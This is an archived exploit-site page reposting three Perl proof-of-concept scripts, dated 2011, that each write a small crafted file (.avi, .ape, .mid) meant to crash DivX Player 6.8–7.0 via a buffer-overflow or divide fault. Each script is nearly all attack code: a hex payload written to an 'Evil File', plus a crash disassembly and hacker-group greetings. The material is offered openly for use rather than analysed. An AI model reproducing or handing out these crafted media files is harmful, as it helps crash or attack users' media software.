首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
DivX Player 7.0 Buffer Overflow
来源:ked-h@hotmail.com 作者:KedAns-Dz 发布时间:2011-03-28  
================================
#!/usr/bin/perl

###
# Title : DivX Player v7.0 (.avi) Buffer Overflow
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Windows 
# Impact : Overflow in 'DivX Player.exe' Process
# Tested on : Windows XP SP3 Fran�ais 
# Target : DivX Player v6.8 & 6.9 & 7.0
###
# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
# ------------
# Usage : 1 - Creat AVI file (14 bytes)
#      =>    2 - Open AVI file With DivX Player
#      =>    3 -  OverFlow & Crshed !!!
# ------------
# Homologue Bug in MP_Classic: (http://exploit-db.com/exploits/11535) || By : cr4wl3r 
# ------------
# Assembly Error in [quartz.dll] ! 74872224() ! :
# 0x74872221 ,0x83 0xd2 0x00 || [adc] edx,0
# 0x74872224 ,0xf7 0xf1 [div] || eax,acx << (" Error Here ")
# 0x74872226 ,0x0f 0xa4 0xc2 0x10 [shld] || edx,eax,10h
# ------------
#START SYSTEM /root@MSdos/ :
system("title KedAns-Dz");
system("color 1e");
system("cls");
print "\n\n";                  
print "    |============================================|\n";
print "    |= [!] Name : DivX Player v6 & 7.0 AVI File =|\n";
print "    |= [!] Exploit : Local Buffer Overflow      =|\n";
print "    |= [!] Author : KedAns-Dz                   =|\n";
print "    |= [!] Mail: Ked-h(at)hotmail(dot)com       =|\n";
print "    |============================================|\n";
sleep(2);
print "\n";
# Creating ...
my $PoC = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00"; # AVI Header
open(file , ">", "Kedans.avi"); # Evil File AVI (14 bytes) 4.0 KB
print file $PoC;  
print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";
close(file);  

# Thanks To : ' cr4wl3r ' From Indonesia & All Indonesia MusLim HacKers

#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================  
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
# Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com)
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX 
# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * x000.com 
# www.metasploit.com * www.securityreason.com *  All Security and Exploits Webs ...
#================================================================================================



================================
#!/usr/bin/perl

###
# Title : DivX Player v7.0 (.ape) Buffer Overflow
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Windows 
# Impact : Overflow in 'DivX Player.exe' Process
# Tested on : Windows XP SP3 Fran�ais 
# Target : DivX Player v6.8 & 6.9 & 7.0
###
# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
# ------------
# Usage : 1 - Creat APE file ( Monkey's Audio Format )
#      =>    2 - Open APE file With DivX Player 
#      =>    3 -  OverFlow !!!
# Assembly Error in [MonkeySource.ax] ! 0f4151a6() ! :
# 0x0f4151a3 ,0xc2 0x80 0x00 [ret] || 8
# 0x0f4151a6 ,0xf7 0xf3 [div] || eax,abx << (" Error Here ")
# 0x0f4151a8 ,0x31 0xd2 [xor] || edx,edx
# 0x0f4151aa ,0xeb 0xf3 [jmp] || 0x0f41519f
# 0x0f4151ac ,0xc3 [ret] || 
# ------------
#START SYSTEM /root@MSdos/ :
system("title KedAns-Dz");
system("color 1e");
system("cls");
print "\n\n";                  
print "    |===========================================================|\n";
print "    |= [!] Name : DivX Player v6 & 7.0 || Monkey's Audio File  =|\n";
print "    |= [!] Exploit : Buffer Overflow Exploit                   =|\n";
print "    |= [!] Author : KedAns-Dz                                  =|\n";
print "    |= [!] Mail: Ked-h(at)hotmail(dot)com                      =|\n";
print "    |===========================================================|\n";
sleep(2);
print "\n";
# Creating ...
my $PoC = "\x4D\x41\x43\x20\x96\x0f\x00\x00\x34\x00\x00\x00\x18\x00\x00\x00"; # APE Header
open(file , ">", "Kedans.ape"); # Evil File APE (16 bytes) 4.0 KB
print file $PoC;  
print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";
close(file);  
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================  
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
# Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com)
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX 
# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * x000.com 
# www.metasploit.com * www.securityreason.com *  All Security and Exploits Webs ...
#================================================================================================


================================
#!/usr/bin/perl

###
# Title : DivX Player v7.0 (.mid) Buffer Overflow
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Windows 
# Impact : Overflow in 'DivX Player.exe' Process
# Tested on : Windows XP SP3 Fran�ais 
# Target : DivX Player v6.8 & 6.9 & 7.0
###
# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
# ------------
# Usage : 1 - Creat MID file 
#      =>    2 - Open MID file With DivX Player 
#      =>    3 -  OverFlow !!!
# ------------
# Homologue Bug in MP_Classic: (http://exploit-db.com/exploits/9620) || By : PLATEN 
# ------------
# Assembly Error in [quartz.dll] ! 74872224() ! :
# 0x74872221 ,0x83 0xd2 0x00 || [adc] edx,0
# 0x74872224 ,0xf7 0xf1 [div] || eax,acx << (" Error Here ")
# 0x74872226 ,0x0f 0xa4 0xc2 0x10 [shld] || edx,eax,10h
# ------------
#START SYSTEM /root@MSdos/ :
system("title KedAns-Dz");
system("color 1e");
system("cls");
print "\n\n";                  
print "    |===========================================|\n";
print "    |= [!] Name : DivX Player v6 & 7.0 (.mid)  =|\n";
print "    |= [!] Exploit : Buffer Overflow Exploit   =|\n";
print "    |= [!] Author : KedAns-Dz                  =|\n";
print "    |= [!] Mail: Ked-h(at)hotmail(dot)com      =|\n";
print "    |===========================================|\n";
sleep(2);
print "\n";
# Creating ...
my $PoC = # MID Header
"\x4d\x54\x68\x64\x00\x00\x00\x06\x00\x01\x00\x01\x00\x60\x4d\x54".
"\x72\x6b\x00\x00\x00\x4e\x00\xff\x03\x08\x34\x31\x33\x61\x34\x61".
"\x35\x30\x00\x91\x41\x60\x01\x3a\x60\x01\x4a\x60\x01\x50\x60\x7d".
"\x81\x41\x01\x01\x3a\x5f\x8d\xe4\xa0\x01\x50\x01\x3d\x91\x41\x60".
"\x81\x00\x81\x41\x40\x00\x91\x3a\x60\x81\x00\x76\x6f\xcc\x3d\xa6".
"\xc2\x48\xee\x8e\xca\xc2\x57\x00\x91\x50\x60\x81\x00\x81\x50\x40".
"\x00\xff\x2f\x00";
open(file , ">", "Kedans.mid"); # Evil File MID (100 bytes) 4.0 KB
print file $PoC;  
print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";
close(file);  

# Thanks To : ' PLATEN  '  & All Iranian MusLim HacKers

#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================  
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
# Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com)
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX 
# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * x000.com 
# www.metasploit.com * www.securityreason.com *  All Security and Exploits Webs ...
#================================================================================================

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Windows Media Player 11.0 Buff
·FLVPlayer4Free 2.9 Stack Overf
·RealPlayer 11.0 Buffer Overflo
·FengOffice 1.7.4 Shell Upload
·Eircom Netopia Router Backdoor
·eXPert PDF Editor 7.0.880.0 Cr
·wodWebServer.NET 1.3.3 Directo
·VLC AMV Dangling Pointer Vulne
·HP OpenView Network Node Manag
·ClanSphere 2010.3 / CKEditor S
·Konqueror KDE 3.5 Crash Handle
·Avaya IP Office Manager 8.1 TF
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved